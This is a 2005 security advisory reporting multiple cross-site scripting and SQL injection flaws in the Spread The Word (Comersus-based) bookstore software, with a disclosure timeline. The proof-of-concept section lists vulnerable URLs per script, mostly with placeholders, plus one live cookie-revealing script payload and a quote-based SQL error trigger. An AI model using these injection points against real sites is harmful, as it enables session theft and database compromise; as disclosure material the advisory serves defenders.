Lucene search
LostmonPACKETSTORM:39307HistoryAug 14, 2005 - 12:00 a.m.
comersusXSSsql.txt
2005-08-1400:00:00
Lostmon
packetstormsecurity.com
24
`##################################################################
Spread The Word (comersus based bookstore ) multiple script and
variables XSS and SQL Injections vulnerabilities.
vendor url:http://www.stwm.com/opportunity.asp
advisore url:http://lostmon.blogspot.com/2005/05/
spread-word-multiple-xss-and-sql.html
vendor notified:yes exploit available: yes
##################################################################
Spread The Word (comersus based bookstore ) contains a flaw that
allows a remote cross site scripting attack.This flaw exists because
the application does not validate multiple variables upon submission
to multiple scripts.This could allow a user to create a specially
crafted URL that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.
##############
versions:
##############
I can´t established what version are affected.
##############
solution:
##############
no solution was available at this time.
##############
timeline
##############
discovered: 17 oct 2004
vendor notify: 08 april 2005
vendor response: 11 april 2005
disclosure: 24 may 2005
####################
proof of concepts:
####################
Some files have different prefix like STW
ej: 'ShowContent.asp' in others stores are 'STWShowContent.asp'
#####################
BrowseCategories.asp
#####################
XSS,sql errors and path disclosure.
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible[XSS-here]
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[XSS-here]&Cat1Literal=Bible
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts[XSS-here]&Cat1=839&Cat1Literal=Bible
http://[target]/store/BrowseCategories.asp?Cat0=783[XSS-here]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible
http://[target]/store/BrowseCategories.asp?Cat0=783[SQL-INJECTION]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[SQL-INJECTION]&Cat1Literal=Bible
Cat0literal can be books, videos,gifts,bibles,or other categories
similar listed in the cart.
#############
search.asp
#############
XSS,sql errors and path disclosure.
http://[target]/store/Search.asp?SearchType=565[SQL-INJECTION]&strSearch=lalala
http://[target]/store/Search.asp?InStock=[XSS-here]&SearchType=783&strSearch=i&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=[XSS-here]&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1[XSS-here]&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1[XSS-here]&PriceMin=&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=[XSS-here]&PriceMax=&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=[XSS-here]&PublicationDate=-1
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=1&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate='
##################
AdvancedSearch.asp
##################
http://[target]/store/AdvancedSearch.asp?strSearch=[XSS-CODE]&SearchType=-1&SearchCat1=-1&SearchCat2=-1&Author=dd&PublicationDate=-1&PriceMin=1&PriceMax=111111111&B1=Submit
##################
ViewItem.asp
##################
XSS,sql errors and path disclosure.
http://[target]/store/ViewItem.asp?ISBN=0789906651[XSS-here]&Cat0=565
http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[XSS-here]
http://[target]/store/ViewItem.asp?ISBN=0789906651[SQL-INJECTION]&Cat0=565
http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[SQL-INJECTION]
####################
STWShowContent.asp
###################
XSS ,sql errors and path disclosure.
http://[target]/store/STWShowContent.asp?idRightPage=13032[XSS-CODE]
http://[target]/store/STWShowContent.asp?idRightPage=13032[SQL-INJECTION]
http://[target]/store/STWShowContent.asp
###################
MySide.Asp
###################
XSS,sql errors and path disclosure.
http://[target]/store/MySide.Asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]
http://[target]/store/MySide.Asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles
#################
BrowseMain.asp
#################
XSS ,sql errors and path disclosure.
http://[target]/store/BrowseMain.asp?Cat0=565[XSS-CODE]&Cat0Literal=Bibles&CurHigh=4
http://[target]/store/BrowseMain.asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4
http://[target]/store/BrowseMain.asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4
http://[target]/store/BrowseMain.asp?Cat0=783&Cat0Literal=Gifts&CurHigh=3"><script>alert(document.cookie)</script>
################
others
################
XSS
http://[target]/store/[email protected]&RedirectURL=[XSS-CODE]
http://[target]/store/Login.asp?RedirectURL=[XSS-code]
Also it´s posible to we can inject sql or XSS code in 'Cat0' variable or 'Cat1'
in all files where this variables are used.
Also it´s posible to we can inject XSS code in 'Cat0literal' variable
or 'Cat1literal'
in all files where this variables are used.
######################### End ########################
thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente
`